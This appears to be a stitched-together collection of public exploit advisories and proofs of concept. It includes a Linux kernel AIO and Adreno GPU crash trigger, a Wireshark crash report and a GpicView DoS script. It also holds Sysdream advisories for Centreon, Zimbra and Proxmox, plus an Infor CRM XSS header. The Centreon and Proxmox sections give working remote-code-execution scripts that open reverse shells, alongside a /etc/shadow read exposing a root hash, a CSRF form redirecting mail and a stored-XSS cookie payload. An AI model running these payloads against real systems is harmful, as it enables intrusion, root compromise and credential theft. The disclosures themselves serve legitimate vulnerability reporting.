#include <linux/if.h>
#include <linux/if_pppox.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>
int main(int argc, char *argv[]) {
struct sockaddr_pppol2tp sax;
struct sockaddr_in addr;
int s, sfd, ret;
struct iocb *iocbp;
struct iocb iocb;
aio_context_t ctx_id = 0;
void *data;
s = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
if (s == -1) {
perror("socket");
return -1;
}
memset(&sax, 0, sizeof(struct sockaddr_pppol2tp));
sax.sa_family = AF_PPPOX;
sax.sa_protocol = PX_PROTO_OL2TP;
sax.pppol2tp.fd = -1;
sax.pppol2tp.addr.sin_addr.s_addr = addr.sin_addr.s_addr;
sax.pppol2tp.addr.sin_port = addr.sin_port;
sax.pppol2tp.addr.sin_family = AF_INET;
sax.pppol2tp.s_tunnel = -1;
sax.pppol2tp.s_session = 0;
sax.pppol2tp.d_tunnel = -1;
sax.pppol2tp.d_session = 0;
sfd = connect(s, (struct sockaddr *)&sax, sizeof(sax));
if (sfd == -1) {
perror("connect");
return -1;
}
data = mmap(NULL, 0x100001000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (data == MAP_FAILED) {
perror("mmap");
return -1;
}
memset(data, 0x41, 0x100001000);
ret = syscall(__NR_io_setup, 2, &ctx_id);
if (ret == -1) {
perror("io_setup");
return -1;
}
memset(&iocb, 0, sizeof(struct iocb));
iocb.aio_fildes = s;
iocb.aio_lio_opcode = IOCB_CMD_PWRITE;
iocb.aio_nbytes = 0xfffffe60;
iocb.aio_buf = (unsigned long) &data;
iocbp = &iocb;
syscall(__NR_io_submit, ctx_id, 1, &iocbp);
return 0;
}
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=734
The Adreno GPU driver for the MSM Linux kernel contains a heap
overflow in the IOCTL_KGSL_PERFCOUNTER_QUERY ioctl command. The bug
results from an incorrect conversion to a signed type when calculating
the minimum count value for the query option. This results in a
negative integer being used to calculate the size of a buffer, which
can result in an integer overflow and a small sized allocation on
32-bit systems:
int adreno_perfcounter_query_group(struct adreno_device *adreno_dev,
unsigned int groupid, unsigned int __user *countables,
unsigned int count, unsigned int *max_counters)
{
...
if (countables == NULL || count == 0) {
kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
return 0;
}
t = min_t(int, group->reg_count, count);
buf = kmalloc(t * sizeof(unsigned int), GFP_KERNEL);
if (buf == NULL) {
kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
return -ENOMEM;
}
for (i = 0; i < t; i++)
buf[i] = group->regs[i].countable;
Note that the "count" parameter is fully controlled. Setting count =
0x80000001 will result in min_t returning 0x80000001 for "t", and
kmalloc allocating a buffer of size 0x4. The loop will then overflow
"buf" because "t" is unsigned, i.e. a large positive value.
The bug was added in the following commit:
https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/gpu/msm/adreno.c?h=aosp-new/android-msm-angler-3.10-marshmallow-mr1&id=b3b5629aebe98d3eb5ec22e8321c3cd3fc70f59c
A proof-of-concept that triggers this issue (adreno_perfcnt_query.c)
is attached. On Android devices /dev/kgsl-3d0 is typically accessible
in an untrusted app domain, so if exploited this issue could be used
for local privilege escalation.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
struct kgsl_perfcounter_query {
unsigned int groupid;
unsigned int *countables;
unsigned int count;
unsigned int max_counters;
unsigned int __pad[2];
};
#define KGSL_IOC_TYPE 0x09
#define IOCTL_KGSL_PERFCOUNTER_QUERY _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query)
int main(void) {
int fd;
struct kgsl_perfcounter_query data;
unsigned int countables[16];
fd = open("/dev/kgsl-3d0", O_RDWR);
if (fd == -1) {
perror("open");
return -1;
}
memset(&data, 0, sizeof(struct kgsl_perfcounter_query));
data.groupid = 1;
data.countables = (unsigned int *) &countables;
data.count = 0x80000001;
ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &data);
close(fd);
return 0;
}
Source: https://code.google.com/p/google-security-research/issues/detail?id=651
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==14146==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a0 at pc 0x000000b2c8eb bp 0x7ffdfc45fa70 sp 0x7ffdfc45fa68
READ of size 1 at 0x6070000003a0 thread T0
#0 0xb2c8ea in print_hex_data_buffer wireshark/epan/print.c:987:13
#1 0xb2bf43 in print_hex_data wireshark/epan/print.c:904:14
#2 0x5422e2 in print_packet wireshark/tshark.c:4155:10
#3 0x53cb2e in process_packet wireshark/tshark.c:3742:7
#4 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#5 0x52c1df in main wireshark/tshark.c:2197:13
0x6070000003a0 is located 0 bytes inside of 65-byte region [0x6070000003a0,0x6070000003e1)
freed by thread T0 here:
#0 0x4d6ce0 in free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
#1 0xc1fd8e in real_free wireshark/epan/tvbuff_real.c:47:3
#2 0xc2229c in tvb_free_internal wireshark/epan/tvbuff.c:110:3
#3 0xc22049 in tvb_free_chain wireshark/epan/tvbuff.c:135:3
#4 0xc21ed1 in tvb_free wireshark/epan/tvbuff.c:125:2
#5 0xbc972e in free_all_fragments wireshark/epan/reassemble.c:351:4
#6 0xbd40e5 in fragment_add_seq_common wireshark/epan/reassemble.c:1919:5
#7 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
#8 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
#9 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
#10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#16 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#17 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#18 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#19 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#20 0x53c91b in process_packet wireshark/tshark.c:3728:5
#21 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#22 0x52c1df in main wireshark/tshark.c:2197:13
previously allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff6062f0610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0xbe1202 in fragment_add_seq_work wireshark/epan/reassemble.c:1793:2
#3 0xbd4181 in fragment_add_seq_common wireshark/epan/reassemble.c:1925:6
#4 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
#5 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
#6 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
#7 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#9 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#10 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#13 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#14 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#15 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#16 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#17 0x53c91b in process_packet wireshark/tshark.c:3728:5
#18 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#19 0x52c1df in main wireshark/tshark.c:2197:13
SUMMARY: AddressSanitizer: heap-use-after-free wireshark/epan/print.c:987:13 in print_hex_data_buffer
Shadow bytes around the buggy address:
0x0c0e7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
0x0c0e7fff8050: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa
0x0c0e7fff8080: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa
0x0c0e7fff8090: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fd fd
0x0c0e7fff80a0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
0x0c0e7fff80b0: fd fd fd fd fd fa fa fa fa fa 00 00 00 00 00 00
0x0c0e7fff80c0: 00 00 06 fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==14146==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11799. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39503.zip
#!/usr/bin/python
# Exploit Title: GpicView Buffer Overflow DOS
# Date: 25th February 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: lxde.sourceforge.net/gpicview/
# Software Link: https://sourceforge.net/projects/lxde/files/GPicView%20%28image%20Viewer%29/0.2.x/
# Version: 0.2.5
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
#Example: python POC.py [image-file]
from sys import argv
from subprocess import Popen
from shlex import split
from time import sleep
import shutil
def DOS(arg):
#"""------------------------------------"""#
command = 'gpicview ' + arg[1] #''' Recieve file & construct Popen '''#
command_2 = split(command) #"""------------------------------------"""#
#"|" "|"#
Popen(command_2) #""" Open file with Gpicview """#
#"""------------------------------------"""#
print("Required: You have 15 seconds")
print("to click on preferences, and ")
print("check 'Auto Save Images' ")
sleep(15)
#"""------------------------------------"""#
buffer = 'A' * 70 + '.png' #"|" Rename image with Buffer "|"#
shutil.move(arg[1], buffer) #"""------------------------------------"""#
def main():
print("Author: David Silveiro ")
print("Company: Xino.co.uk ")
print(" POC Gpicview DOS ")
DOS(argv)
print("File ready for overflow ")
print("Now simply rotate the image")
if __name__ == "__main__":
main()
Unauthenticated Remote Command Execution in Centreon Web Interface
==================================================================
Description
===========
Centreon is a popular monitoring solution.
A critical vulnerability has been found in the Centreon logging class
allowing remote users to execute arbitrary commands.
SQL injection leading to RCE
============================
Centreon logs SQL database errors in a log file using the "echo" system
command and the exec() PHP function. On the authentification class,
Centreon use htmlentities with the ENT_QUOTES options to filter SQL
entities.
However, Centreon doesn't filter the SQL escape character "\" and it is
possible to generate an SQL Error.
Because of the use of the "echo" system command with the PHP exec()
function, and because of the lack of sanitization, it is possible to
inject arbitrary system commands.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-78
----------------
Proof of Concept
----------------
TCP Reverse Shell using python.
#!/usr/bin/env python
import requests
import argparse
def shell(target, reverseip, reverseport):
payload = 'import socket as a,subprocess as b,os as
c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);'
% (reverseip,reverseport)
print "[~] Starting reverseshell : %s - port : %d" % (reverseip,
reverseport)
req = requests.post(target, data={"useralias": "$(echo %s |
base64 -d | python)\\" % payload.encode("base64").replace("\n",""),
"password": "foo"})
print "[+] DEAD !"
if __name__ == "__main__":
print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@sysdream.com>"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True)
parser.add_argument("--reverseip", required=True)
parser.add_argument("--reverseport", required=True, type=int)
args = parser.parse_args()
shell(args.target, args.reverseip, args.reverseport)
Shell :
nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py
--target=http://172.16.138.137/centreon/index.php
--reverseip=172.16.138.1 --reverseport 8888
[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@sysdream.com>
[~] Starting reverseshell : 172.16.138.1 - port : 8888
# Other term
nightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888
Ncat: Version 6.45 ( http://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.16.138.135.
Ncat: Connection from 172.16.138.135:50050.
whoami
apache
groups
apache centreon-engine centreon-broker centreon nagios
---------------
Vulnerable code
---------------
The vulnerable code is located in class/centreonLog.class.php, line 82
and line 154:
/*
* print Error in log file.
*/
exec("echo \"".$string."\" >> ".$this->errorType[$id]);
In class/centreonAuth.class.php, line 227:
$DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE
`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "'
AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1");
--------
Solution
--------
Update to the Centreon 2.5.4
Possible root password disclosure in centengine (Centreon Entreprise Server)
============================================================================
In some configurations, when centengine can run as root (with sudo).
It's possible to read some file content.
**Access Vector**: local
**Security Risk**: high
**Vulnerability**: CWE-209
----------------
Proof of Concept
----------------
$ sudo /usr/sbin/centengine -v /etc/shadow
[1416391088] reading main config file
[1416391088] error while processing a config file: [/etc/shadow:1]
bad variable name:
'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'
[1416391088]
---------------
Vulnerable code
---------------
In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon
CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *
--------
Solution
--------
Do not allow centengine to be run as root or do not disclose the line
that caused the error.
Timeline (dd/mm/yyyy)
=====================
* 18/11/2014 : Initial discovery
* 26/11/2014 : Contact with Centreon team
* 27/11/2014 : Centreon correct vulnerabilities
* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities
Fixes
=====
*
https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9
*
https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d
*
https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1
Affected versions
=================
* Centreon <= 2.5.3
Credits
=======
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
======================================
Multiple CSRF in Zimbra Mail interface
======================================
CVE-2015-6541
Description
===========
Multiple CSRF vulnerabilities have been found in the Mail interface of
Zimbra 8.0.9 GA Release, enabling to change account
preferences like e-mail forwarding.
CSRF
====
Forms in the preferences part of old releases of Zimbra are vulnerable
to CSRF because of the lack of a CSRF token identifying a valid session.
As a consequence, requests can be forged and played arbitrarily.
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-352
**CVSS Base score**: 5.8
----------------
Proof of Concept
----------------
<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171/service/soap/BatchRequest" method="POST">
<input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="ZimbraWebClient - FF38
(Win)" version="8.0.9_GA_6191"/><session xmlns="" id="19"/><account
xmlns="" by="name">anto@mail.ubuntu.fr</account><format xmlns=""
type="js"/></context></soap:Header><soap:Body><BatchRequest
xmlns="urn:zimbra" onerror="stop"><ModifyPrefsRequest
xmlns="urn:zimbraAccount" requestId="0"><pref xmlns=""
name="zimbraPrefMailForwardingAddress">itworks@ubuntu.fr</pref></ModifyPrefsRequest><a
xmlns="" n'
value='"sn">itworks</a></BatchRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Solution
========
Sensitive forms should be protected by a CSRF token.
Fixes
=====
Fixed with 8.5 release : bug 83547
(https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5)
Affected versions
=================
* Zimbra <= 8.0.9 GA Release
Credits
=======
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
-dot- fr)
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)
=====================================================================
Proxmox VE 3/4 Insecure Hostname Checking (Remote Root Exploit, XSS,
Privileges escalation)
=====================================================================
Description
===========
Proxmox is a popular virtualization solution based on KVM and Linux
containers.
A critical vulnerability has been found in Proxmox VE 3 (OpenVZ) and
Proxmox VE 4 beta 1 (LXC) in the
virtual machine creating form allowing authenticated remote users to
overwrite configuration files settings.
Configuration file overwriting
==============================
Because the Proxmox VE application doesn't check the
user-provided "hostname" POST parameter, it's
possible to overwrite configuration files using a CRLF injection.
In Proxmox VE 3, we successfully gained access to the host filesystem
from a container and elevated our container capabilities, allowing us to
obtain user credentials and sniff the network.
In Proxmox VE 4b1, because LXC allows "hooks" to execute commands, we
successfully gained root privileges on the host.
It's also possible to exploit Proxmox clusters.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-915
Proof of Concept
----------------
The following exploit works for Proxmox VE 4 beta 1. The
lxc.hook.pre-start configuration variable is used to trigger the ncat
reverse-shell payload when the container is started.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse
from time import sleep
def exploit(target, username, password, vmid, template, realm,
reverse, hostname):
payload = "ncat %s %s -e /bin/sh" % reverse
print "[~] Obtaining authorization key..."
apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
verify=False,
data={"username": username,
"password": password,
"realm": realm})
response = apireq.json()
if "success" in response and response["success"]:
print "[+] Authentication success."
ticket = response["data"]["ticket"]
csrfticket = response["data"]["CSRFPreventionToken"]
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken":
csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname":"sysdream\nlxc.hook.pre-start=%s &&" % payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpulimit": 1,
"cpuunits": 1024,
"net0":"name=eth0"})
if createvm.status_code == 200:
response = createvm.json()
if "success" in response and response["success"]:
print "[+] Container Created... (Sleeping 20 seconds)"
sleep(20)
print "[+] Starting container..."
startcontainer =
requests.post("https://%s/api2/extjs/nodes/%s/lxc/%s/status/start" %
(target, hostname, vmid), verify=False, headers={"CSRFPreventionToken":
csrfticket}, cookies={"PVEAuthCookie": ticket})
if startcontainer.status_code == 200:
response = startcontainer.json()
if "success" in response and response["success"]:
print "[+] Exploit should be working..."
else:
print "[!] Can't start container ! Try to
start it manually."
else:
print "[!] Error creating container..."
print response
else:
print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
else:
print "[!] Authentication failed - Check the credentials..."
def handler(lport):
print "[~] Starting handler on port %d" % lport
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
conn, addr = s.accept()
print "[+] Connection from %s" % addr[0]
t.sock = conn
print "[+] Pop the shell ! :)"
t.interact()
if __name__ == "__main__":
print "[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas
Chatelain <n.chatelain[at]sysdream.com>\n"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")
parser.add_argument("--username", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--localhost", required=True, help="Local
host IP for the connect-back shell.")
parser.add_argument("--localport", required=True, type=int,
help="Local port for local bind handler")
parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")
parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
help="An existing template in the hypervisor "
"(default :
local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])
parser.add_argument("--hostname", required=True, help="The
target hostname")
args = parser.parse_args()
handlerthr = Thread(target=handler, args=(args.localport,))
handlerthr.start()
exploitthr = Thread(target=exploit, args=(args.target,
args.username, args.password, args.vmid, args.template, args.realm,
(args.localhost, args.localport), args.hostname))
exploitthr.start()
handlerthr.join()
Shell output :
nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python
remoteroot.py --target 10.25.0.101:8006 --username nicolas --password
pveuser --localhost 10.25.0.10 --localport 9999 --vmid 456 --realm pve
--hostname pve4
[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas Chatelain
<n.chatelain[at]sysdream.com>
[~] Starting handler on port 9999
[~] Obtaining authorization key...
[+] Authentication success.
[+] Container Created... (Sleeping 20 seconds)
[+] Exploit should be working...
[+] Connection from 10.25.0.101
[+] Pop the shell !
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
The following exploit works for Proxmox VE 3. This proof of concept
mount the host /dev/dm-0 on the container and add multiples capabilities
on the container.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse
def exploit(target, username, password, vmid, template, realm,
hostname):
payload = "sysdream\"\nDEVNODES=\"dm-0:r
\"\nCAPABILITIES=\"mknod:on, sys_chroot:on, sys_rawio: on, net_admin:on,
dac_override:on\"\n#"
print "[~] Obtaining authorization key..."
apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
verify=False,
data={"username": username,
"password": password,
"realm": realm})
response = apireq.json()
if "success" in response and response["success"]:
print "[+] Authentication success."
ticket = response["data"]["ticket"]
csrfticket = response["data"]["CSRFPreventionToken"]
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken":
csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname": payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpus": 1,
"netif":"ifname=eth0,bridge=vmbr0"})
if createvm.status_code == 200:
response = createvm.json()
if "success" in response and response["success"]:
print "[+] Countainer (Capabilities + DM-0 Mount)
Created."
else:
print "[!] Error creating container..."
print response
else:
print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
else:
print "[!] Authentication failed - Check the credentials..."
if __name__ == "__main__":
print "[~] Proxmox VE 3 Authenticated Privileges Escalation
Exploit - Nicolas Chatelain <n.chatelain[at]sysdream.com>\n"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")
parser.add_argument("--username", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")
parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
help="An existing template in the hypervisor
(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
parser.add_argument("--hostname", required=True, help="The
target hostname")
parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])
args = parser.parse_args()
exploit(args.target, args.username, args.password, args.vmid,
args.template, args.realm, args.hostname)
Shell output :
nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python
privescalation.py --username root --password sysofdream --vmid 123
--realm pam --target 10.25.0.110:8006 --hostname pve3
[~] Proxmox VE 3 Authenticated Privileges Escalation Exploit -
Nicolas Chatelain <n.chatelain[at]sysdream.com>
[~] Obtaining authorization key...
[+] Authentication success.
[+] Countainer (Capabilities + DM-0 Mount) Created.
-- On container :
root@sysdream:/# ls -lah /dev/dm-0
brw-r----T 1 root root 253, 0 Aug 23 00:33 /dev/dm-0
---
Stored Cross-Site Scripting
===========================
Same vulnerability, different usage. Works on Proxmox 3 and Proxmox 4b1.
**Access Vector**: remote
**Security Risk**: high
Proof of Concept
----------------
The following exploit will create a stored XSS displaying the user
cookies and the PVE CSRFPreventionToken.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse
def exploit(target, username, password, vmid, template, realm,
version, hostname):
payload =
"eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,45,34,32,43,32,80,86,69,46,67,83,82,70,80,114,101,118,101,110,116,105,111,110,84,111,107,101,110,41,59))"
print "[~] Obtaining authorization key..."
apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
verify=False,
data={"username": username,
"password": password,
"realm": realm})
response = apireq.json()
if "success" in response and response["success"]:
print "[+] Authentication success."
ticket = response["data"]["ticket"]
csrfticket = response["data"]["CSRFPreventionToken"]
if version == "4":
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken":
csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname":"<img/src='x'/onerror=%s>" % payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpulimit": 1,
"cpuunits": 1024,
"net0":"name=eth0"})
elif version == "3":
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken": csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname":"<img/src='x'/onerror=%s>" % payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpus": 1,
"netif":"ifname=eth0,bridge=vmbr0"})
if createvm.status_code == 200:
response = createvm.json()
if "success" in response and response["success"]:
print "[+] Stored XSS Created."
else:
print "[!] Error creating container..."
print response
else:
print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
else:
print "[!] Authentication failed - Check the credentials..."
if __name__ == "__main__":
print "[~] Proxmox VE 3/4b1 Stored Cross Site Scripting -
Nicolas Chatelain <n.chatelain[at]sysdream.com>\n"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")
parser.add_argument("--username", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")
parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
help="An existing template in the hypervisor
(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])
parser.add_argument("--version", default="3", choices=["3",
"4"], help="The Proxmox version to exploit")
parser.add_argument("--hostname", required=True, help="The
target hostname")
args = parser.parse_args()
exploit(args.target, args.username, args.password, args.vmid,
args.template, args.realm, args.version, args.hostname)
---------------
Vulnerable code
---------------
The vulnerable code is located in the /usr/share/perl5/PVE/LXC.pm for
Proxmox 4.
For Proxmox 3, the vulnerable code is located in
/usr/share/perl5/PVE/OpenVZ.pm.
--------
Solution
--------
Proxmox 4 : Update to pve-container 0.9-22
Proxmox 3 : Update to pve-manager 3.4-10
Timeline (dd/mm/yyyy)
=====================
04/09/2015 : Initial discovery.
17/09/2015 : Contact with proxmox team.
18/09/2015 : Proxmox fixes the vulnerabilities.
18/09/2015 : Proxmox releases a new pve-container version (0.9-22)
18/09/2015 : Proxmox releases a new pve-manager version (3.4-10)
Affected versions
=================
* Proxmox VE 4
* Proxmox VE 3
Credits
=======
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities
Vendor: Infor
Product web page: http://www.infor.com
Affected version: 8.2.0.1136
Summary: Infor® CRM, formerly Saleslogix, is an award-winning
customer relationship management (CRM) solution that provides
a complete view of customer interactions, so your business can
collaborate and respond promptly and knowledgably to customer
inquiries, sales opportunities, and service requests. Infor CRM
includes a robust suite of sales, marketing, and service capabilities,
to offer businesses of all sizes a fast, flexible, and affordable
solution for finding, winning, and growing profitable customer
relationships.
Desc: Infor CRM suffers from multiple stored cross-site scripting
vulnerabilities. Input passed to several POST/PUT parameters in
JSON format is not properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: Microsoft-IIS/8.5
ASP.NET/4.0.30319
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5308
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php
21.01.2016
---
----------------------------------
Affected parameter(s): description
----------------------------------
